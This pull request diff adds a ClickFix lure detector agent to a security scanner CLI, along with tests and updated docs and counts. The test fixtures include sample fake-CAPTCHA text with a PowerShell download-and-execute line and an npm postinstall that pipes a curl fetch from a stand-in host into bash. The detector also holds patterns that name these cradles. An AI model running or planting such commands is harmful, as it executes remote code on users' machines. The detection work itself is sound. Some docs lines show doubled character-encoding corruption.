### PR TITLE
Promote ClickFix to first-class ClickFixAgent (v9.5.0 P0)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -55,16 +55,33 @@ model supply chain.
     package name. Excludes the project's own package name, scoped packages
     resolved correctly. Maps to CWE-1357, CWE-829.
 
+- **ClickFixAgent** (28th agent, Supply Chain category) — promotes the ClickFix
+  detector (previously embedded in RobloxSecurityAgent) to a first-class,
+  cross-platform detector:
+  - `CLICKFIX_PASTE_RUN` (high) — fake-error / fake-CAPTCHA framing next to a
+    paste-and-run keystroke sequence (Ctrl+C→Ctrl+V→Enter, Win+R, command bar);
+    confidence raised when a PowerShell download-cradle is nearby. Runs across
+    docs, HTML, source, and shell/PowerShell files.
+  - `CLICKFIX_FAKE_INSTALLER` (high) — an npm `preinstall`/`postinstall`/etc.
+    lifecycle script that pipes a remote fetch into a shell (the fake-installer
+    mechanism, e.g. the OpenClaw ClickFix npm package). Maps to CWE-1357,
+    CWE-506, CWE-77.
+- RobloxSecurityAgent no longer carries the ClickFix rule (moved to
+  ClickFixAgent); its Roblox-specific coverage is unchanged.
+
 ### Changed
-- Agent count 24 → 27 across CLI, README, docs, and marketing site.
+- Agent count 24 → 28 across CLI, README, docs, and marketing site.
 
 ### Tests
-- 19 new tests (212 → 231): ModelScan payload detection, unsafe-format flagging,
+- 23 net new tests (212 → 235): ModelScan payload detection, unsafe-format flagging,
   safetensors safety, `.bin` false-positive guard, archive evasion, the
   source-level `torch.load` loader; plus TrustBoundary symlink (sensitive /
   escaping / benign) and Friendly Fire (curl|bash, run-on-review, clean-README)
   coverage; plus SlopSquat phantom-import, known-hallucination, and
-  false-positive guards (declared / installed / builtin / self / scoped).
+  false-positive guards (declared / installed / builtin / self / scoped); plus
+  ClickFix lure detection (Ctrl+V and Win+R lures, PowerShell cradle, fake
+  npm installer) with clean-docs and normal-postinstall negatives. The two
+  ClickFix cases moved out of the RobloxSecurityAgent suite into ClickFixAgent.
 
 ## [9.4.1] — 2026-07-13 — Interactive shell stability fix
 

--- a/README.md
+++ b/README.md
@@ -37,7 +37,7 @@ No signup. No API key required for scanning. Works offline for core checks.
 # Interactive REPL: scan, fix, and ask questions in one session
 npx ship-safe
 
-# Full audit: secrets + 27 agents + deps + remediation plan
+# Full audit: secrets + 28 agents + deps + remediation plan
 npx ship-safe audit .
 
 # Interactive fix agent: plan, diff, approve, verify
@@ -127,10 +127,11 @@ All agents run in parallel. Each skips irrelevant projects automatically.
 | **HermesSecurityAgent** | AI/LLM | Tool registry poisoning, function-call injection, skill permission drift (ASI-01âASI-10) |
 | **AgentAttestationAgent** | Supply Chain | Unpinned agent versions, missing integrity hashes, unsigned manifests (ASI-10, SLSA L0) |
 | **AgenticSupplyChainAgent** | Supply Chain | Over-privileged AI CI actions, OAuth scope creep, unsigned AI webhook receivers (ASI-02, ASI-06) |
-| **RobloxSecurityAgent** | Supply Chain | Malicious Roblox/Luau Toolbox assets (runtime asset injection, `rbxassetid://` loaders, `HttpEnabled`, payloads hidden in instance attributes) + cross-platform ClickFix paste-and-run lures |
+| **RobloxSecurityAgent** | Supply Chain | Malicious Roblox/Luau Toolbox assets (runtime asset injection, `rbxassetid://` loaders, `HttpEnabled`, payloads hidden in instance attributes) |
 | **ModelScanAgent** | Supply Chain | Code-execution payloads in ML model weights (pickle opcodes in `.pt`/`.pkl`/`.ckpt`), `torch.load` without `weights_only`, scanner-evasion archives (CWE-502, CWE-506) |
 | **TrustBoundaryAgent** | Agentic | GhostApproval symlink attacks (config-named links into `~/.ssh`/`~/.aws`/`.env`), repo symlinks escaping the tree, and Friendly Fire run-on-review instructions in agent-read docs (CWE-59, CWE-61) |
 | **SlopSquatAgent** | Supply Chain | Hallucinated / phantom package imports (slopsquatting) — bare imports not declared, installed, or builtin, plus known AI-hallucinated names (CWE-1357) |
+| **ClickFixAgent** | Supply Chain | ClickFix / fake-CAPTCHA paste-and-run lures (fake error + Win+R/Ctrl+V/command-bar keystrokes, PowerShell cradles) and fake-installer npm lifecycle scripts (CWE-1357, CWE-506) |
 
 **Post-processors:** ScoringEngine Â· VerifierAgent (secrets liveness) Â· DeepAnalyzer (LLM taint analysis)
 

--- a/cli/__tests__/clickfix-agent.test.js
+++ b/cli/__tests__/clickfix-agent.test.js
@@ -1,0 +1,79 @@
+/**
+ * Ship Safe — ClickFixAgent
+ * ==========================
+ *
+ * Verifies cross-platform ClickFix lure detection, fake-installer npm scripts,
+ * and false-positive guards.
+ *
+ * Run: npm test
+ */
+
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import fs from 'fs';
+import path from 'path';
+import os from 'os';
+
+import { ClickFixAgent } from '../agents/clickfix-agent.js';
+
+function tmp() { return fs.mkdtempSync(path.join(os.tmpdir(), 'shipsafe-clickfix-')); }
+function cleanup(dir) { try { fs.rmSync(dir, { recursive: true, force: true }); } catch { /* */ } }
+
+async function scanText(content, ext) {
+  const dir = tmp();
+  const file = path.join(dir, `x${ext}`);
+  try {
+    fs.writeFileSync(file, content);
+    return await new ClickFixAgent().analyze({ rootPath: dir, files: [file], recon: {}, options: {} });
+  } finally { cleanup(dir); }
+}
+
+describe('ClickFixAgent — lures', () => {
+  it('flags a fake-error paste-and-run lure (Ctrl+C/Ctrl+V)', async () => {
+    const lure = 'Error 501\nSomething went wrong.\nTo fix this, copy the text and paste it into the command bar.\n(Ctrl+C -> Shift+F5 -> Ctrl+V -> Enter)';
+    const f = await scanText(lure, '.txt');
+    assert.ok(f.some((x) => x.rule === 'CLICKFIX_PASTE_RUN' && x.severity === 'high'));
+  });
+
+  it('flags a fake-CAPTCHA Win+R lure and raises confidence with a PS cradle', async () => {
+    const lure = 'Verify you are human.\nTo continue: press Win+R, then Ctrl+V, then Enter.\npowershell iwr https://evil/x | iex';
+    const f = await scanText(lure, '.html');
+    const hit = f.find((x) => x.rule === 'CLICKFIX_PASTE_RUN');
+    assert.ok(hit);
+    assert.equal(hit.confidence, 'high');
+  });
+
+  it('does not flag an ordinary error message', async () => {
+    const f = await scanText('Error 500: internal server error. Check the logs and retry.', '.txt');
+    assert.equal(f.length, 0);
+  });
+
+  it('does not flag docs that mention Ctrl+C without a lure framing', async () => {
+    const f = await scanText('Press Ctrl+C to copy the command, then Ctrl+V to paste it into your editor.', '.md');
+    assert.equal(f.length, 0);
+  });
+});
+
+describe('ClickFixAgent — fake installers', () => {
+  it('flags a postinstall that pipes a remote fetch into a shell', async () => {
+    const dir = tmp();
+    try {
+      fs.writeFileSync(path.join(dir, 'package.json'), JSON.stringify({
+        name: 'x', scripts: { postinstall: 'curl -s https://evil.sh | bash' },
+      }));
+      const f = await new ClickFixAgent().analyze({ rootPath: dir, files: [], recon: {}, options: {} });
+      assert.ok(f.some((x) => x.rule === 'CLICKFIX_FAKE_INSTALLER' && x.severity === 'high'));
+    } finally { cleanup(dir); }
+  });
+
+  it('does not flag a normal build postinstall', async () => {
+    const dir = tmp();
+    try {
+      fs.writeFileSync(path.join(dir, 'package.json'), JSON.stringify({
+        name: 'x', scripts: { postinstall: 'node ./scripts/build.js' },
+      }));
+      const f = await new ClickFixAgent().analyze({ rootPath: dir, files: [], recon: {}, options: {} });
+      assert.equal(f.filter((x) => x.rule === 'CLICKFIX_FAKE_INSTALLER').length, 0);
+    } finally { cleanup(dir); }
+  });
+});

--- a/cli/__tests__/roblox-security-agent.test.js
+++ b/cli/__tests__/roblox-security-agent.test.js
@@ -162,20 +162,3 @@ describe('RobloxSecurityAgent — .rbxmx XML', () => {
   });
 });
 
-describe('RobloxSecurityAgent — ClickFix lure', () => {
-  it('flags a fake-error paste-and-run lure', async () => {
-    const lure = [
-      'Error 501',
-      'Something went wrong with this game.',
-      'To fix this, copy the text in the textbox and paste it into the command bar.',
-      '(Ctrl+C -> Shift+F5 -> Ctrl+V -> Press Enter)',
-    ].join('\n');
-    const f = await scan(lure, '.txt');
-    assert.ok(f.some(x => x.rule === 'CLICKFIX_PASTE_RUN' && x.severity === 'high'));
-  });
-
-  it('does not flag an ordinary error message with no paste instruction', async () => {
-    const f = await scan('Error 500: internal server error. Check the logs.', '.txt');
-    assert.equal(f.filter(x => x.rule === 'CLICKFIX_PASTE_RUN').length, 0);
-  });
-});

--- a/cli/agents/clickfix-agent.js
+++ b/cli/agents/clickfix-agent.js
@@ -1,0 +1,123 @@
+/**
+ * ClickFixAgent — paste-and-run social-engineering detector
+ * =========================================================
+ *
+ * ClickFix (and its CrashFix / fake-CAPTCHA variants) tricks a victim into
+ * copying text and running it via a keystroke sequence — "to fix this error,
+ * press Win+R, Ctrl+V, Enter." Activity surged ~517% into 2026 and is now aimed
+ * squarely at developers: a malicious npm package posed as an OpenClaw installer
+ * (Mar 2026), showing a fake CLI before prompting for the system password.
+ *
+ * This is the promotion of the ClickFix rule (originally embedded in
+ * RobloxSecurityAgent) into a first-class, cross-platform detector. It runs
+ * over anything a developer might read or execute — docs, HTML, source, and
+ * especially npm lifecycle scripts (`preinstall` / `postinstall`) where a fake
+ * installer would live.
+ *
+ * Maps to: CWE-1357 (Insufficiently Trustworthy Component), CWE-506, CWE-77.
+ *          Class: Supply Chain.
+ */
+
+import fs from 'fs';
+import path from 'path';
+import { BaseAgent, createFinding } from './base-agent.js';
+
+// Fake-error / verification framing that fronts the lure.
+const FRAMING = /(?:error\s*\d{3}|something\s+went\s+wrong|verify\s+(?:you\s+are|that\s+you'?re)\s+(?:a\s+)?human|i'?m\s+not\s+a\s+robot|confirm\s+you'?re\s+human|to\s+(?:fix|resolve|continue|proceed)\b|cloudflare\s+(?:check|verification)|complete\s+the\s+(?:captcha|verification))/i;
+
+// The paste-and-run action: keystroke choreography or an explicit run target.
+const ACTION = /(?:ctrl\s*\+\s*c\b[\s\S]{0,180}ctrl\s*\+\s*v|win(?:dows)?\s*\+\s*r|cmd\s*\+\s*(?:space|v)|shift\s*\+\s*f5|(?:run|open)\s+(?:the\s+)?(?:command\s+bar|terminal|run\s+dialog|powershell)|paste\s+(?:it|this|the\s+(?:text|code|command)))/i;
+
+// PowerShell download-cradle often hidden in the pasted payload.
+const PS_CRADLE = /\b(?:i(?:ex|nvoke-expression)|iwr|invoke-webrequest|new-object\s+net\.webclient|downloadstring|frombase64string)\b/i;
+
+// Files worth scanning for a lure (docs/pages/source a dev reads or runs).
+const SCAN_EXT = new Set([
+  '.md', '.txt', '.html', '.htm', '.mdx', '.rst',
+  '.js', '.jsx', '.ts', '.tsx', '.mjs', '.cjs',
+  '.sh', '.bash', '.ps1', '.bat', '.cmd', '.py', '.lua', '.luau', '.rbxmx', '.rbxlx',
+]);
+
+// npm lifecycle scripts a fake installer would abuse.
+const RISKY_SCRIPTS = ['preinstall', 'install', 'postinstall', 'prepare', 'preuninstall'];
+
+export class ClickFixAgent extends BaseAgent {
+  constructor() {
+    super(
+      'ClickFixAgent',
+      'Detects ClickFix / fake-CAPTCHA paste-and-run social-engineering lures and fake installers',
+      'supply-chain'
+    );
+  }
+
+  shouldRun() {
+    return true;
+  }
+
+  async analyze(context) {
+    const { rootPath } = context;
+    const findings = [];
+
+    for (const file of this.getFilesToScan(context)) {
+      const ext = path.extname(file).toLowerCase();
+      if (SCAN_EXT.has(ext)) findings.push(...this._scanLure(file));
+    }
+
+    // npm lifecycle scripts that pull-and-run a remote script (fake installer).
+    findings.push(...this._scanPackageScripts(rootPath));
+
+    return findings;
+  }
+
+  _scanLure(file) {
+    const content = this.readFile(file);
+    if (!content || !FRAMING.test(content)) return [];
+
+    const idx = content.search(FRAMING);
+    // framing and action must sit near each other
+    const near = content.slice(Math.max(0, idx - 240), idx + 700);
+    if (!ACTION.test(near)) return [];
+
+    const line = content.slice(0, idx).split('\n').length;
+    const hasCradle = PS_CRADLE.test(near);
+    return [createFinding({
+      file, line, severity: 'high', category: 'supply-chain',
+      rule: 'CLICKFIX_PASTE_RUN',
+      title: 'ClickFix paste-and-run social-engineering lure',
+      description: `A fake error / human-verification prompt appears next to an instruction to copy content and run it via a keystroke sequence (Ctrl+C→Ctrl+V→Enter, Win+R, command bar).${hasCradle ? ' The nearby payload contains a PowerShell download-cradle.' : ''} No legitimate tool asks a developer to paste and run code to recover from an error.`,
+      matched: (content.slice(idx).match(FRAMING) || [''])[0].slice(0, 80),
+      confidence: hasCradle ? 'high' : 'medium',
+      cwe: 'CWE-1357',
+      fix: 'Do not run the instructed command. Remove this lure; treat the page/asset that rendered it as compromised.',
+    })];
+  }
+
+  _scanPackageScripts(rootPath) {
+    const pkgPath = path.join(rootPath, 'package.json');
+    if (!fs.existsSync(pkgPath)) return [];
+    let pkg;
+    try { pkg = JSON.parse(fs.readFileSync(pkgPath, 'utf-8')); } catch { return []; }
+    const scripts = pkg.scripts || {};
+    const findings = [];
+
+    for (const name of RISKY_SCRIPTS) {
+      const cmd = scripts[name];
+      if (typeof cmd !== 'string') continue;
+      // Remote fetch piped straight into a shell/interpreter.
+      if (/(?:curl|wget|iwr|invoke-webrequest)\b[^\n|;&]{0,200}[|;&]{1,2}\s*(?:sudo\s+)?(?:bash|sh|zsh|node|python3?|pwsh|powershell|iex)\b/i.test(cmd)) {
+        findings.push(createFinding({
+          file: pkgPath, line: 0, severity: 'high', category: 'supply-chain',
+          rule: 'CLICKFIX_FAKE_INSTALLER',
+          title: `npm ${name} script downloads and runs a remote script`,
+          description: `The \`${name}\` lifecycle script fetches a remote script and pipes it into a shell. This runs automatically on install — the mechanism behind fake-installer packages (e.g. the OpenClaw ClickFix npm package).`,
+          matched: cmd.slice(0, 100),
+          confidence: 'high', cwe: 'CWE-506',
+          fix: `Remove the download-and-run from \`${name}\`. Vendor and pin any install steps; never pipe a network fetch into a shell in a lifecycle script.`,
+        }));
+      }
+    }
+    return findings;
+  }
+}
+
+export default ClickFixAgent;

--- a/cli/agents/index.js
+++ b/cli/agents/index.js
@@ -36,6 +36,7 @@ export { RobloxSecurityAgent } from './roblox-security-agent.js';
 export { ModelScanAgent } from './model-scan-agent.js';
 export { TrustBoundaryAgent } from './trust-boundary-agent.js';
 export { SlopSquatAgent } from './slopsquat-agent.js';
+export { ClickFixAgent } from './clickfix-agent.js';
 export { ABOMGenerator } from './abom-generator.js';
 export { VerifierAgent } from './verifier-agent.js';
 export { DeepAnalyzer } from './deep-analyzer.js';
@@ -45,7 +46,7 @@ export { PolicyEngine } from './policy-engine.js';
 export { HTMLReporter } from './html-reporter.js';
 
 /**
- * Create a fully configured orchestrator with all 27 scanning agents.
+ * Create a fully configured orchestrator with all 28 scanning agents.
  * (VerifierAgent and DeepAnalyzer run as post-processors, not in the agent pool.)
  *
  * Plugin system: if rootPath is provided, custom agents from
@@ -80,6 +81,7 @@ import { RobloxSecurityAgent as RobloxSecurityAgentClass } from './roblox-securi
 import { ModelScanAgent as ModelScanAgentClass } from './model-scan-agent.js';
 import { TrustBoundaryAgent as TrustBoundaryAgentClass } from './trust-boundary-agent.js';
 import { SlopSquatAgent as SlopSquatAgentClass } from './slopsquat-agent.js';
+import { ClickFixAgent as ClickFixAgentClass } from './clickfix-agent.js';
 import { loadPlugins } from '../utils/plugin-loader.js';
 
 const BUILT_IN_AGENTS = () => [
@@ -110,6 +112,7 @@ const BUILT_IN_AGENTS = () => [
   new ModelScanAgentClass(),
   new TrustBoundaryAgentClass(),
   new SlopSquatAgentClass(),
+  new ClickFixAgentClass(),
 ];
 
 /** Synchronous build — no plugin support. Used by legacy callers. */

--- a/cli/agents/roblox-security-agent.js
+++ b/cli/agents/roblox-security-agent.js
@@ -2,35 +2,26 @@
  * Roblox / Game-Asset Supply-Chain Agent
  * ======================================
  *
- * Detects the malicious-asset supply-chain and social-engineering attack class
- * that targets Roblox / Luau developers, plus the cross-platform "ClickFix"
- * paste-and-run lure that targets developers everywhere.
+ * Detects the malicious game-asset supply-chain attack class that targets
+ * Roblox / Luau developers. (The cross-platform "ClickFix" paste-and-run lure
+ * that this incident also surfaced is now its own first-class ClickFixAgent.)
  *
- * Two attack families:
- *
- *   1. GAME-ASSET SUPPLY CHAIN (Roblox Toolbox / Marketplace)
- *      A free model (footballer, anime character, game asset) is inserted into
- *      a place during prototyping. It carries obfuscated Luau that:
- *        - downloads a second-stage model at runtime via game:GetObjects /
- *          require(assetId)  (rbxassetid://...)
- *        - enables HttpService for exfiltration / C2
- *        - removes an internal version/detection guard before running it
- *        - stores its payload in an INSTANCE ATTRIBUTE (not script source) so
- *          source-only scanners never see it. In a Rojo-managed repo this
- *          serializes to a base64 <BinaryString name="AttributesSerialize">
- *          blob inside the .rbxmx / .rbxlx XML.
- *
- *   2. CLICKFIX SOCIAL ENGINEERING (cross-platform)
- *      A fake error / CAPTCHA dialog ("Error 501", "verify you are human")
- *      instructs the developer to copy text and run it via a keystroke
- *      sequence (Ctrl+C -> Shift+F5 -> Ctrl+V -> Enter, or Win+R). Lures show
- *      up in HTML overlays, READMEs, docs, and embedded UI text.
+ * GAME-ASSET SUPPLY CHAIN (Roblox Toolbox / Marketplace)
+ *   A free model (footballer, anime character, game asset) is inserted into
+ *   a place during prototyping. It carries obfuscated Luau that:
+ *     - downloads a second-stage model at runtime via game:GetObjects /
+ *       require(assetId)  (rbxassetid://...)
+ *     - enables HttpService for exfiltration / C2
+ *     - removes an internal version/detection guard before running it
+ *     - stores its payload in an INSTANCE ATTRIBUTE (not script source) so
+ *       source-only scanners never see it. In a Rojo-managed repo this
+ *       serializes to a base64 <BinaryString name="AttributesSerialize">
+ *       blob inside the .rbxmx / .rbxlx XML.
  *
  * Scans:
  *   - .lua / .luau source files
  *   - .rbxmx / .rbxlx XML model/place files (script <ProtectedString> source
  *     AND decoded instance attributes)
- *   - any text/markdown/HTML file (ClickFix lure only)
  *
  * Maps to: CWE-506 (Embedded Malicious Code), CWE-829 (Untrusted Functionality),
  *          CWE-94 (Code Injection), CWE-1357 (Reliance on Insufficiently
@@ -132,17 +123,8 @@ const DEFINITE_RULES = new Set([
   'ROBLOX_ATTRIBUTE_PAYLOAD_LOADER',
 ]);
 
-// =============================================================================
-// CLICKFIX LURE (run on any text/markdown/HTML file)
-// =============================================================================
-
-// Error/CAPTCHA framing near an instruction to copy text and run it via keys.
-const CLICKFIX_FRAMING = /(?:error\s*\d{3}|verify\s+(?:you\s+are|that\s+you'?re)\s+(?:a\s+)?human|i'?m\s+not\s+a\s+robot|something\s+went\s+wrong\s+with\s+this)/i;
-const CLICKFIX_ACTION = /(?:ctrl\s*\+\s*c\b[\s\S]{0,160}ctrl\s*\+\s*v|win\s*\+\s*r|shift\s*\+\s*f5|command\s+bar|paste\s+(?:it|this|the\s+(?:text|code)))/i;
-
 const SCANNABLE_LUAU_EXT = new Set(['.lua', '.luau']);
 const SCANNABLE_RBX_EXT = new Set(['.rbxmx', '.rbxlx']);
-const CLICKFIX_EXT = new Set(['.lua', '.luau', '.rbxmx', '.rbxlx', '.html', '.htm', '.md', '.txt', '.json', '.js', '.ts']);
 
 // =============================================================================
 // AGENT
@@ -152,16 +134,13 @@ export class RobloxSecurityAgent extends BaseAgent {
   constructor() {
     super(
       'RobloxSecurityAgent',
-      'Detects malicious Roblox/Luau Toolbox assets (runtime asset injection, attribute-stored payloads, obfuscated loaders) and cross-platform ClickFix paste-and-run lures',
+      'Detects malicious Roblox/Luau Toolbox assets: runtime asset injection, attribute-stored payloads, and obfuscated loaders',
       'supply-chain'
     );
   }
 
-  /**
-   * Run when the project shows any Roblox/Luau signal, OR always for the
-   * ClickFix lure (which is platform-agnostic). We gate the expensive Roblox
-   * passes per-file by extension, so running broadly is cheap.
-   */
+  // Roblox-specific rules only; the cross-platform ClickFix lure is now its
+  // own first-class detector (ClickFixAgent).
   shouldRun() {
     return true;
   }
@@ -177,10 +156,6 @@ export class RobloxSecurityAgent extends BaseAgent {
         findings.push(...this._scanLuaSource(file, this.readFile(file), null, 'firstparty'));
       } else if (SCANNABLE_RBX_EXT.has(ext)) {
         findings.push(...this._scanRbxXml(file));
-      }
-
-      if (CLICKFIX_EXT.has(ext)) {
-        findings.push(...this._scanClickFix(file));
       }
     }
 
@@ -326,33 +301,6 @@ export class RobloxSecurityAgent extends BaseAgent {
       }
     }
     return findings;
-  }
-
-  // ── ClickFix lure ────────────────────────────────────────────────────────────
-
-  _scanClickFix(file) {
-    const content = this.readFile(file);
-    if (!content) return [];
-    // Match within a sliding window so framing + action must be near each other.
-    if (!CLICKFIX_FRAMING.test(content)) return [];
-    const idx = content.search(CLICKFIX_FRAMING);
-    const window = content.slice(Math.max(0, idx - 200), idx + 600);
-    if (!CLICKFIX_ACTION.test(window)) return [];
-
-    const lineNum = content.slice(0, idx).split('\n').length;
-    return [createFinding({
-      file,
-      line: lineNum,
-      severity: 'high',
-      category: 'supply-chain',
-      rule: 'CLICKFIX_PASTE_RUN',
-      title: 'ClickFix paste-and-run social-engineering lure',
-      description: 'Text presents a fake error or human-verification prompt next to an instruction to copy content and run it via a keystroke sequence (e.g. Ctrl+C -> Ctrl+V -> Enter, Win+R, command bar). This is the ClickFix lure pattern. No legitimate tool asks a developer to paste and run code to recover from an error.',
-      matched: (content.slice(idx).match(CLICKFIX_FRAMING) || [''])[0].slice(0, 80),
-      confidence: 'medium',
-      cwe: 'CWE-1357',
-      fix: 'Do not run the instructed code. Remove this lure. Treat the asset/page that rendered it as compromised.',
-    })];
   }
 
   // ── helpers ──────────────────────────────────────────────────────────────────

--- a/package.json
+++ b/package.json
@@ -1,7 +1,7 @@
 {
   "name": "ship-safe",
   "version": "9.5.0",
-  "description": "AI-powered multi-agent security platform. 27 agents scan 80+ attack classes including AI integration supply chain (Vercel-class attacks), Hermes Agent deployments (ASI-01–ASI-10), tool registry poisoning, function-call injection, skill permission drift, and agent attestation. Ship Safe × Hermes Agent.",
+  "description": "AI-powered multi-agent security platform. 28 agents scan 80+ attack classes including AI integration supply chain (Vercel-class attacks), Hermes Agent deployments (ASI-01–ASI-10), tool registry poisoning, function-call injection, skill permission drift, and agent attestation. Ship Safe × Hermes Agent.",
   "main": "cli/index.js",
   "bin": {
     "ship-safe": "cli/bin/ship-safe.js"

--- a/webapp/app/docs/page.tsx
+++ b/webapp/app/docs/page.tsx
@@ -6,13 +6,13 @@ const ogImage = 'https://www.shipsafecli.com/og1.png';
 
 export const metadata: Metadata = {
   title: 'Documentation',
-  description: 'Complete Ship Safe documentation: LLM vulnerability CLI commands, MCP configuration security scanning, RAG poisoning detection, CI/CD integration, 27 agent reference, and API docs.',
+  description: 'Complete Ship Safe documentation: LLM vulnerability CLI commands, MCP configuration security scanning, RAG poisoning detection, CI/CD integration, 28 agent reference, and API docs.',
   keywords: ['Ship Safe docs', 'LLM vulnerability CLI', 'MCP configuration security', 'RAG poisoning detection', 'AI agent security scanner', 'ship-safe commands', 'ship-safe agents', 'DevSecOps documentation', 'OWASP Agentic AI Top 10'],
   alternates: {
     canonical: 'https://www.shipsafecli.com/docs',
   },
   openGraph: {
-    title: 'Ship Safe Documentation â v9.5.0',
+    title: 'Ship Safe Documentation Ã¢ÂÂ v9.5.0',
     description: 'Every command, agent, and flag. LLM vulnerability CLI, MCP security configuration, RAG poisoning detection, CI/CD integration, and API reference.',
     type: 'website',
     url: 'https://www.shipsafecli.com/docs',
@@ -21,7 +21,7 @@ export const metadata: Metadata = {
   },
   twitter: {
     card: 'summary_large_image',
-    title: 'Ship Safe Documentation â v9.5.0',
+    title: 'Ship Safe Documentation Ã¢ÂÂ v9.5.0',
     description: 'Every command, agent, and flag. LLM vulnerability CLI, MCP security configuration, RAG poisoning detection, CI/CD integration, and API reference.',
     images: [ogImage],
   },
@@ -41,7 +41,7 @@ export default function Docs() {
     <>
       <script
         type="application/ld+json"
-        dangerouslySetInnerHTML={{ __html: JSON.stringify(jsonLd) }} // ship-safe-ignore â static JSON-LD, no user input
+        dangerouslySetInnerHTML={{ __html: JSON.stringify(jsonLd) }} // ship-safe-ignore Ã¢ÂÂ static JSON-LD, no user input
       />
       <Nav />
       <main className={styles.docsPage}>
@@ -52,7 +52,7 @@ export default function Docs() {
               <a href="#installation">Installation</a>
               <a href="#quick-start">Quick Start</a>
               <a href="#commands">Commands</a>
-              <a href="#agents">27 Security Agents</a>
+              <a href="#agents">28 Security Agents</a>
               <a href="#scoring">Scoring System</a>
               <a href="#cicd">CI/CD Integration</a>
               <a href="#github-action">GitHub Action</a>
@@ -73,12 +73,12 @@ export default function Docs() {
               <span className={styles.sectionLabel}>// docs</span>
               <h1>Ship Safe CLI</h1>
               <p className={styles.subtitle}>
-                27 AI security agents. 80+ attack classes. One command.
+                28 AI security agents. 80+ attack classes. One command.
               </p>
               <pre className={styles.heroCode}><code>npx ship-safe audit .</code></pre>
             </header>
 
-            {/* ââ Installation ââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ Installation Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="installation">
               <h2>Installation</h2>
               <p>Ship Safe requires Node.js 18 or later. No signup or API key required.</p>
@@ -94,13 +94,13 @@ export OPENAI_API_KEY=sk-...
 export GOOGLE_AI_API_KEY=AIza...`}</code></pre>
             </section>
 
-            {/* ââ Quick Start âââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ Quick Start Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="quick-start">
               <h2>Quick Start</h2>
               <pre><code>{`# Full security audit with remediation plan + HTML report
 npx ship-safe audit .
 
-# Red team: 27 agents, 80+ attack classes
+# Red team: 28 agents, 80+ attack classes
 npx ship-safe red-team .
 
 # Quick secret scan
@@ -119,7 +119,7 @@ npx ship-safe diff --staged
 npx ship-safe ci . --threshold 80`}</code></pre>
             </section>
 
-            {/* ââ Commands ââââââââââââââââââââââââââââââââââââââââââââ */}
+            {/* Ã¢ÂÂÃ¢ÂÂ Commands Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
             <section id="commands">
               <h2>Commands</h2>
 
@@ -128,8 +128,8 @@ npx ship-safe ci . --threshold 80`}</code></pre>
                 <table>
                   <thead><tr><th>Command</th><th>Description</th></tr></thead>
                   <tbody>
-                    <tr><td><code>audit .</code></td><td>Full audit: secrets + 27 agents + deps + remediation plan + HTML report</td></tr>
-                    <tr><td><code>red-team .</code></td><td>Run 27 agents with 80+ attack classes</td></tr>
+                    <tr><td><code>audit .</code></td><td>Full audit: secrets + 28 agents + deps + remediation plan + HTML report</td></tr>
+                    <tr><td><code>red-team .</code></td><td>Run 28 agents with 80+ attack classes</td></tr>
                     <tr><td><code>scan .</code></td><td>Secret scanner (pattern matching + entropy scoring)</td></tr>
                     <tr><td><code>score .</code></td><td>Security health score (0-100, A-F grade)</td></tr>
                     <tr><td><code>deps .</code></td><td>Dependency CVE audit with EPSS scores</td></tr>
@@ -144,12 +144,12 @@ npx ship-safe ci . --threshold 80`}</code></pre>
                   <thead><tr><th>Command</th><th>Description</th></tr></thead>
                   <tbody>
                     <tr><td><code>ship-safe</code></td><td>Drop into the interactive REPL (bare invocation on a TTY)</td></tr>
-                    <tr><td><code>shell .</code></td><td>Explicit REPL â slash commands, streaming LLM, persistent session</td></tr>
-                    <tr><td><code>agent .</code></td><td>Interactive fix loop: scan â plan â diff â accept/skip/edit/quit â verify</td></tr>
+                    <tr><td><code>shell .</code></td><td>Explicit REPL Ã¢ÂÂ slash commands, streaming LLM, persistent session</td></tr>
